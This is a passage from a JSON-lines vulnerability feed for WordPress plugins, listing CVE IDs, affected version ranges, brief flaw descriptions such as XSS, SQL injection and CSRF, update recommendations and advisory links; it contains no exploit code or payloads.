{"CVE_ID":"CVE-2023-3139","slug":"protect-wp-admin","versionEndExcluding":"4.0","description":"The Protect WP Admin WordPress plugin before 4.0 discloses the URL of the admin panel via a redirection of a crafted URL, bypassing the protection offered.","refs":"[{\"url\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-3139.txt\",\"name\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-3139.txt\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f8a29aee-19cd-4e62-b829-afc9107f69bd\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f8a29aee-19cd-4e62-b829-afc9107f69bd\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3849","slug":"click-to-chat-for-whatsapp","versionImpact":"3.35","versionEndExcluding":"4.0","description":"The Click to Chat \u2013 HoliThemes plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.35. This makes it possible for authenticated attackers, with contributor access or above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe25bfef-34f0-4d57-9cba-9dcbf58281c6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe25bfef-34f0-4d57-9cba-9dcbf58281c6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/tools\\\/woo\\\/class-ht-ctc-woo.php#L284\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/tools\\\/woo\\\/class-ht-ctc-woo.php#L284\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/admin\\\/admin_demo\\\/class-ht-ctc-admin-demo.php#L280\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/admin\\\/admin_demo\\\/class-ht-ctc-admin-demo.php#L280\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/inc\\\/chat\\\/class-ht-ctc-chat-shortcode.php#L207\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/inc\\\/chat\\\/class-ht-ctc-chat-shortcode.php#L207\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/inc\\\/chat\\\/class-ht-ctc-chat.php#L291\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/inc\\\/chat\\\/class-ht-ctc-chat.php#L291\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/inc\\\/group\\\/class-ht-ctc-group-shortcode.php#L160\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/inc\\\/group\\\/class-ht-ctc-group-shortcode.php#L160\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/inc\\\/group\\\/class-ht-ctc-group.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/inc\\\/group\\\/class-ht-ctc-group.php#L118\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/inc\\\/share\\\/class-ht-ctc-share-shortcode.php#L181\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/inc\\\/share\\\/class-ht-ctc-share-shortcode.php#L181\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/inc\\\/share\\\/class-ht-ctc-share.php#L135\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/new\\\/inc\\\/share\\\/class-ht-ctc-share.php#L135\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/prev\\\/inc\\\/class-ccw-shortcode.php#L277\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/prev\\\/inc\\\/class-ccw-shortcode.php#L277\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/prev\\\/inc\\\/commons\\\/styles.php#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/3.35\\\/prev\\\/inc\\\/commons\\\/styles.php#L93\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3072112%40click-to-chat-for-whatsapp%2Ftrunk&old=3064395%40click-to-chat-for-whatsapp%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3072112%40click-to-chat-for-whatsapp%2Ftrunk&old=3064395%40click-to-chat-for-whatsapp%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1596","slug":"td-composer","versionEndExcluding":"4.0","description":"The tagDiv Composer WordPress plugin before 4.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cada9be9-522a-4ce8-847d-c8fff2ddcc07\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cada9be9-522a-4ce8-847d-c8fff2ddcc07\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1267","slug":"groundhogg","versionImpact":"3.7.4.1","versionEndExcluding":"4.0","description":"The Groundhogg plugin for Wordpress is vulnerable to Stored Cross-Site Scripting via the \u2018label' parameter in versions up to, and including, 3.7.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/groundhoggwp\\\/groundhogg\\\/commit\\\/5206bf2482e2fe210ccca6e7dcfe62ffe85b3061\",\"name\":\"https:\\\/\\\/github.com\\\/groundhoggwp\\\/groundhogg\\\/commit\\\/5206bf2482e2fe210ccca6e7dcfe62ffe85b3061\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/trunk\\\/assets\\\/js\\\/admin\\\/forms\\\/form-builder-v2.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/trunk\\\/assets\\\/js\\\/admin\\\/forms\\\/form-builder-v2.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/trunk\\\/assets\\\/js\\\/admin\\\/forms\\\/form-builder-v2.js#L859\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/trunk\\\/assets\\\/js\\\/admin\\\/forms\\\/form-builder-v2.js#L859\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3264477\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3264477\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/763a9aff-9bc0-4c79-9383-778a9034b436?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/763a9aff-9bc0-4c79-9383-778a9034b436?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2256","slug":"woocommerce-product-addon","versionEndExcluding":"32.0.7","description":"The Product Addons & Fields for WooCommerce WordPress plugin before 32.0.7 does not sanitize and escape some URL parameters, leading to Reflected Cross-Site Scripting.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1187e041-3be2-4613-8d56-c2394fcc75fb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1187e041-3be2-4613-8d56-c2394fcc75fb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1839","slug":"woocommerce-product-addon","versionEndExcluding":"32.0.6","description":"The Product Addons & Fields for WooCommerce WordPress plugin before 32.0.6 does not sanitize and escape some of its setting fields, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fddc5a1c-f267-4ef4-8acf-731dbecac450\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fddc5a1c-f267-4ef4-8acf-731dbecac450\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13343","slug":"woocommerce-customers-manager","versionImpact":"31.3","versionEndExcluding":"31.4","description":"The WooCommerce Customers Manager plugin for WordPress is vulnerable to Privilege Escalation due to a missing capability check on the ajax_assign_new_roles() function in all versions up to, and including, 31.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to elevate their privileges to that of an administrator.","recommendation":"Update to version 31.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-customers-manager\\\/10965432\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-customers-manager\\\/10965432\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/193c9fe9-17bc-47e7-b93d-dfcebcf8004d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/193c9fe9-17bc-47e7-b93d-dfcebcf8004d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1747","slug":"woocommerce-customers-manager","versionImpact":"30.1","versionEndExcluding":"30.2","description":"The WooCommerce Customers Manager WordPress plugin before 30.2 does not have authorisation and CSRF in various AJAX actions, allowing any authenticated users, such as subscriber, to call them and update\/delete\/create customer metadata, also leading to Stored Cross-Site Scripting due to the lack of escaping of said metadata values.","recommendation":"Update to version 30.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17e45d4d-0ee1-4863-a8a4-df8587f448ec\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17e45d4d-0ee1-4863-a8a4-df8587f448ec\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3983","slug":"woocommerce-customers-manager","versionEndExcluding":"30.1","description":"The WooCommerce Customers Manager WordPress plugin before 30.1 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting customers via CSRF attacks","recommendation":"Update to version 30.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e4059d66-07b9-4f1a-a461-d6e8f0e98eec\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e4059d66-07b9-4f1a-a461-d6e8f0e98eec\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2843","slug":"woocommerce-customers-manager","versionEndExcluding":"30.1","description":"The WooCommerce Customers Manager WordPress plugin before 30.1 does not have CSRF checks in some places, which could allow attackers to make logged in admin users delete users via CSRF attacks","recommendation":"Update to version 30.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fec4e077-4c4e-4618-bfe8-61fdba59b696\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fec4e077-4c4e-4618-bfe8-61fdba59b696\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-47446","slug":"store-locator","versionEndExcluding":"3.98.8","description":"Cross-Site Request Forgery (CSRF) vulnerability in Viadat Creations Store Locator for WordPress with Google Maps \u2013 LotsOfLocales plugin <=\u00a03.98.7 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/store-locator\\\/wordpress-store-locator-for-wordpress-with-google-maps-lotsoflocales-plugin-3-98-7-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/store-locator\\\/wordpress-store-locator-for-wordpress-with-google-maps-lotsoflocales-plugin-3-98-7-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4849","slug":"wp-automatic","versionImpact":"3.94.0","versionEndExcluding":"3.95.0","description":"The WordPress Automatic Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018autoplay\u2019 parameter in all versions up to, and including, 3.94.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.95.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4be58bfa-d489-45f5-9169-db8bab718175?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4be58bfa-d489-45f5-9169-db8bab718175?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wordpress-automatic-plugin\\\/1904470\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wordpress-automatic-plugin\\\/1904470\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1203","slug":"ml-slider","versionImpact":"3.94.0","versionEndExcluding":"3.95.0","description":"The Slider, Gallery, and Carousel by MetaSlider  WordPress plugin before 3.95.0 does not sanitise and escape some of its settings, which could allow high privilege users such as editor to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.95.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fca0b129-3299-46d6-9231-ca5afd2fdb66\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fca0b129-3299-46d6-9231-ca5afd2fdb66\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1062","slug":"ml-slider","versionImpact":"3.94.0","versionEndExcluding":"3.95.0","description":"The Slider, Gallery, and Carousel by MetaSlider  WordPress plugin before 3.95.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.95.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/657b355b-e38f-46d6-b574-7ce736d25f31\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/657b355b-e38f-46d6-b574-7ce736d25f31\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-48294","slug":"fg-drupal-to-wp","versionImpact":"3.90.0","versionEndExcluding":"3.90.1","description":"Server-Side Request Forgery (SSRF) vulnerability in Kerfred FG Drupal to WordPress allows Server Side Request Forgery. This issue affects FG Drupal to WordPress: from n\/a through 3.90.0.","recommendation":"Update to version 3.90.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/fg-drupal-to-wp\\\/vulnerability\\\/wordpress-fg-drupal-to-wordpress-plugin-3-90-0-server-side-request-forgery-ssrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/fg-drupal-to-wp\\\/vulnerability\\\/wordpress-fg-drupal-to-wordpress-plugin-3-90-0-server-side-request-forgery-ssrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0959","slug":"eventer","versionImpact":"3.9.9.2","versionEndExcluding":"3.9.9.3","description":"The Eventer - WordPress Event & Booking Manager Plugin plugin for WordPress is vulnerable to SQL Injection via the reg_id parameter in all versions up to, and including, 3.9.9.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.9.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventer-wordpress-event-manager-plugin\\\/20972534\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventer-wordpress-event-manager-plugin\\\/20972534\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd42c89e-57db-458f-910c-404a5615f280?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd42c89e-57db-458f-910c-404a5615f280?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11134","slug":"eventer","versionImpact":"3.9.9","versionEndExcluding":"3.9.9.1","description":"The Eventer plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'eventer_export_bookings_csv' function in all versions up to, and including, 3.9.9. This makes it possible for authenticated attackers with subscriber-level permissions or above, to download bookings, which contains customers' personal data.","recommendation":"Update to version 3.9.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventer-wordpress-event-manager-plugin\\\/20972534\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventer-wordpress-event-manager-plugin\\\/20972534\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/476bc092-c623-4caf-9676-3036d27c4840?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/476bc092-c623-4caf-9676-3036d27c4840?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3076","slug":"mstore-api","versionEndExcluding":"3.9.9","description":"The MStore API WordPress plugin before 3.9.9 does not prevent visitors from creating user accounts with the role of their choice via their wholesale REST API endpoint. This is only exploitable if the site owner paid to access the plugin's pro features.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ac662436-29d7-4ea6-84e1-f9e229b44f5b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ac662436-29d7-4ea6-84e1-f9e229b44f5b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11135","slug":"eventer","versionImpact":"3.9.8","versionEndExcluding":"3.9.9","description":"The Eventer plugin for WordPress is vulnerable to SQL Injection via the 'event' parameter in the 'eventer_get_attendees' function in all versions up to, and including, 3.9.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventer-wordpress-event-manager-plugin\\\/20972534\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventer-wordpress-event-manager-plugin\\\/20972534\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8dc0712-f78e-46c5-a0d1-2db752498d54?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8dc0712-f78e-46c5-a0d1-2db752498d54?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4059","slug":"profile-builder","versionEndExcluding":"3.9.8","description":"The Profile Builder WordPress plugin before 3.9.8 lacks authorisation and CSRF in its page creation function which allows unauthenticated users to create the register, log-in and edit-profile pages from the plugin on the blog","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fc719d12-2f58-4d1f-b696-0f937e706842\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fc719d12-2f58-4d1f-b696-0f937e706842\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3077","slug":"mstore-api","versionEndExcluding":"3.9.8","description":"The MStore API WordPress plugin before 3.9.8 does not sanitise and escape a parameter before using it in a SQL statement, leading to a Blind SQL injection exploitable by unauthenticated users. This is only exploitable if the site owner elected to pay to get access to the plugins' pro features, and uses the woocommerce-appointments plugin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9480d0b5-97da-467d-98f6-71a32599a432\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9480d0b5-97da-467d-98f6-71a32599a432\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10799","slug":"eventer","versionImpact":"3.9.7","versionEndExcluding":"3.9.8","description":"The Eventer plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.9.7 via the eventer_woo_download_tickets() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 3.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventer-wordpress-event-manager-plugin\\\/20972534\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventer-wordpress-event-manager-plugin\\\/20972534\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aea5f970-243f-4642-83e1-34db11c4ca63?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aea5f970-243f-4642-83e1-34db11c4ca63?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3209","slug":"mstore-api","versionEndExcluding":"3.9.7","description":"The MStore API WordPress plugin before 3.9.7 does not secure most of its AJAX actions by implementing privilege checks, nonce checks, or a combination of both.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/970735f1-24bb-441c-89b6-5a0959246d6c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/970735f1-24bb-441c-89b6-5a0959246d6c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3131","slug":"mstore-api","versionEndExcluding":"3.9.7","description":"The MStore API WordPress plugin before 3.9.7 does not secure most of its AJAX actions by implementing privilege checks, nonce checks, or a combination of both.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/970735f1-24bb-441c-89b6-5a0959246d6c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/970735f1-24bb-441c-89b6-5a0959246d6c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3202","slug":"mstore-api","versionEndExcluding":"3.9.7","description":"The MStore API plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the mstore_update_firebase_server_key function. This makes it possible for unauthenticated attackers to update the firebase server key to push notification when order status changed via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2b3612e-3c91-469b-98ef-fdb03b0ee9d9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2b3612e-3c91-469b-98ef-fdb03b0ee9d9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2925048%40mstore-api&new=2925048%40mstore-api&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2925048%40mstore-api&new=2925048%40mstore-api&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/mstore-api.php#L232\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/mstore-api.php#L232\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3199","slug":"mstore-api","versionEndExcluding":"3.9.7","description":"The MStore API plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the mstore_update_status_order_title function. This makes it possible for unauthenticated attackers to update status order title via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2925048%40mstore-api&new=2925048%40mstore-api&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2925048%40mstore-api&new=2925048%40mstore-api&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a604df5d-92b3-4df8-a7ef-00f0ee95cf0f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a604df5d-92b3-4df8-a7ef-00f0ee95cf0f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/mstore-api.php#L256\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/mstore-api.php#L256\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3203","slug":"mstore-api","versionEndExcluding":"3.9.7","description":"The MStore API plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the mstore_update_limit_product function. This makes it possible for unauthenticated attackers to update limit the number of product per category to use cache data in home screen via a forged request granted they can trick a site administrator into performing an action such as clicking on a 